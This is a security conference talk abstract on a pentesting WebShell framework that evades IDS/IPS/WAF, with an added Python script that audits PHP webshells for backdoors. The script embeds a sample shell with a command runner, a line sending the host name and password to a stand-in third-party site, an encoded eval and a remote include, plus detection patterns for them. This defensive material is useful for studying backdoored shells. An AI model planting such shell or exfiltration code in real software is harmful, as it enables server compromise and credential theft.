WebShells: A Framework for Penetration Testing
A pentester needs a reliable tool to keep control of a compromised server and to elevate privileges on it. A WebShell is such a tool: once uploaded to the server it is driven through a web interface and gives the pentester system command execution, a file manager, file upload and download, and similar functions.
Because not every server supports the same languages, a WebShell has to be written in a language the target server can execute. The most widely deployed web languages are PHP, ASP.NET and Java, so the majority of WebShells are written in one of those three. Many PHP, ASP and Java WebShells can be found on the Internet. They are usually written by amateurs, or by communities of amateurs, often for malicious ends such as site defacement, spamming or vulnerability exploitation. In most cases their functionality is therefore not adapted to a pentester's needs, and using them is not safe: many WebShells send the sensitive information collected on the compromised server to third-party sites, hide malicious code in their own source, or download additional malicious code from third-party sites. One should therefore be vigilant with this kind of tool and verify, line by line, what the code does before using it.
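The line-by-line review recommended above can be partly mechanized. What follows is an added example, not code from this talk or from the Devoteam framework: a small Python triage script that scans a PHP shell for the three kinds of backdoor the paragraph describes (phone-home exfiltration to a third-party site, obfuscated code hidden in the source, and code loaded from a remote site) and lists every external host the shell talks to. The embedded PHP shell is constructed for the demonstration; its host names use the reserved .invalid domain and the base64 payload decodes to a harmless echo. The indicator patterns are the author's own choices, not a catalogue from the talk.

```python
"""Static triage of a PHP webshell picked up from the Internet.

Added example: flags the constructs the abstract warns about (exfiltration
to third-party sites, hidden/obfuscated code, remote code loading) so the
reviewer knows which lines to read first.
"""
import re
from dataclasses import dataclass

# Constructed sample: a minimal PHP shell with a password gate (md5 of
# "password" hard-coded, as in many shells found online), a command runner,
# and three planted backdoors of the kinds the abstract mentions.
SAMPLE_SHELL = r'''<?php
if (md5($_POST['p']) != '5f4dcc3b5aa765d61d8327deb882cf99') { die('403'); }
// phone home: the host name and the shell password go to a third-party site
@file_get_contents("http://stats.example.invalid/c.php?h=" . $_SERVER['HTTP_HOST'] . "&p=" . $_POST['p']);
if (isset($_POST['cmd'])) { echo "<pre>" . shell_exec($_POST['cmd']) . "</pre>"; }
// hidden code: an encoded payload executed at runtime
eval(base64_decode('ZWNobyAnaGVsbG8nOw=='));
// remote loader: fetches and runs code from elsewhere
@include('http://cdn.example.invalid/lib.txt');
?>'''


@dataclass(frozen=True)
class Finding:
    line: int      # 1-based line number in the reviewed source
    rule: str      # which indicator matched
    snippet: str   # the offending line, stripped


# Indicators of a backdoored shell. Each pattern is deliberately narrow: the
# goal is to point the reviewer at lines to read, not to replace reading.
RULES = [
    # eval()/assert() fed by a decoder: code the author did not want you to read
    ("obfuscated-eval",
     re.compile(r"\b(eval|assert|create_function)\s*\(\s*"
                r"(base64_decode|gzinflate|gzuncompress|str_rot13|strrev|hex2bin)\s*\(")),
    # include/require of a URL: code fetched from a third-party site at runtime
    ("remote-include",
     re.compile(r"\b(include|include_once|require|require_once)\s*\(?\s*['\"]https?://")),
    # outbound HTTP initiated by the shell itself
    ("outbound-request",
     re.compile(r"\b(file_get_contents|fopen|curl_init|curl_setopt|fsockopen)\s*\([^;]*https?://")),
    # request data (password, host, cookies) spliced into a URL: exfiltration
    ("leaks-request-data",
     re.compile(r"https?://.*\$_(POST|GET|REQUEST|SERVER|COOKIE)\[")),
    # classic PHP code-injection sink: preg_replace with the /e modifier
    ("preg-replace-e",
     re.compile(r"\bpreg_replace\s*\(\s*['\"][^'\"]*/[a-df-zA-Z]*e[a-zA-Z]*['\"]")),
    # a very long base64-looking literal is almost always a hidden payload
    ("long-encoded-literal",
     re.compile(r"['\"][A-Za-z0-9+/]{120,}={0,2}['\"]")),
    # mail() gives a shell a second exfiltration channel
    ("mail-call", re.compile(r"\bmail\s*\(")),
]

URL_HOST = re.compile(r"https?://([A-Za-z0-9.-]+)")


def audit_webshell(source: str) -> list[Finding]:
    """Return every indicator hit, in source order (a line may hit several)."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for rule, pattern in RULES:
            if pattern.search(line):
                findings.append(Finding(lineno, rule, line.strip()))
    return findings


def external_hosts(source: str) -> set[str]:
    """Every host the shell references by URL; a clean shell should have none."""
    return set(URL_HOST.findall(source))


if __name__ == "__main__":
    for f in audit_webshell(SAMPLE_SHELL):
        print(f"line {f.line:>3}  {f.rule:<20} {f.snippet}")
    print("talks to:", ", ".join(sorted(external_hosts(SAMPLE_SHELL))) or "nobody")
```

The script is a reading aid, not a verdict: a shell that produces no findings can still be backdoored (function names assembled from strings, payloads split across files, code hidden in an image the shell "includes"), so the flagged lines only tell the reviewer where to start, and the list of external hosts is the quickest sanity check before the shell is ever run on a client's server.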
The Devoteam security audit team used many different WebShells that had been developed independently of one another, either written by the team itself or adopted from existing tools. In practice every pentester had his own set of PHP, ASP and Java shells. This was far from optimal: some of these shells lacked certain functionality, others did not work well on certain types of server or were blocked by an IPS. One purpose of our work was therefore to centralize and homogenize these tools into a single framework that the whole team can use during penetration tests. Another purpose was to design a way to bypass intrusion detection systems such as IDS, IPS and WAF.
We also considered how to protect the WebShell framework itself. It is important to ensure that only the pentester can execute it on the compromised server, so that the WebShell cannot be hijacked by a third party and used for malicious purposes. The most common protection in existing WebShells is a password. However, anyone with access to the compromised server, and hence to the WebShell's source code, can easily defeat it, because the password or its hash is usually written into the source. In the case of a hash, a malicious person who can edit the source can replace the hash with one of their own, or simply delete the authentication check altogether.
Our approach consisted of developing a framework that is thoroughly protected against unauthorized third-party access, that supplies a single interface to the different types of WebShell (PHP, ASP, Java), and that is undetectable by IDS/IPS/WAF. In this talk we first present the state of the art of existing WebShells and of protection and obfuscation methods; we then discuss our approach and demonstrate a proof of concept with the application we have developed at Devoteam.
Note: Presenting with Joffrey Czarny
About Elena Kropochkina
Elena Kropochkina began her professional career in the Devoteam Audit Security team. She graduated from Ecole Polytechnique and Telecom ParisTech with an M.S. in Computer Science, specializing in IT security and artificial intelligence.
About Joffrey Czarny
Joffrey Czarny works for the Devoteam Security Business Unit (FR). A pentester since 2001, he has released advisories on Cisco VoIP products and has spoken at various security conferences (Wireless Conference at Infosec Paris and Wireless Workshop at Hack.lu 2005, VoIP at Hack.lu 2007/2008 and ITunderground 2008/2009). On his site, www.insomnihack.net, he maintains the Elsenot project (http://insomnihack.net/elsenot/) and posts video tutorials and tools on several security topics.